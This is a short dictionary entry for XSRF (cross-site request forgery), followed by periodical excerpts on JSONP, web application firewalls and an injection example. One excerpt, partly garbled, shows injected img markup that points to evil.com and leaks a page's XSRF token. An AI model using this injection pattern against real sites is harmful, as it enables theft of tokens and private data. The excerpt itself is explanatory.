XSRF


Also found in: Acronyms.

XSRF

(CROSS-Site Request Forgery) See CSRF.
Mentioned in ?
References in periodicals archive ?
JSONP is a popular method for building JavaScript APIs, such as integrating with third-party services (e.g., to implement search or mapping capabilities) and retrieving private first-party data (e.g., an additional referer check or an XSRF token).
A typical example is [<img src='http://evil.com?.bar] elliptically legitimate code <input name="xsrf Joken" value="123"> elliptically legitimate code' elliptically legitimate code <div> where the underlined part is injected by attackers and the request for the image will carry the sensitive information.
Ultimately, a WAF is capable of uncovering fraudulent use of parameters (XSS, XSRF, SQL injection, parameter tampering, etc.) without specific knowledge of an application.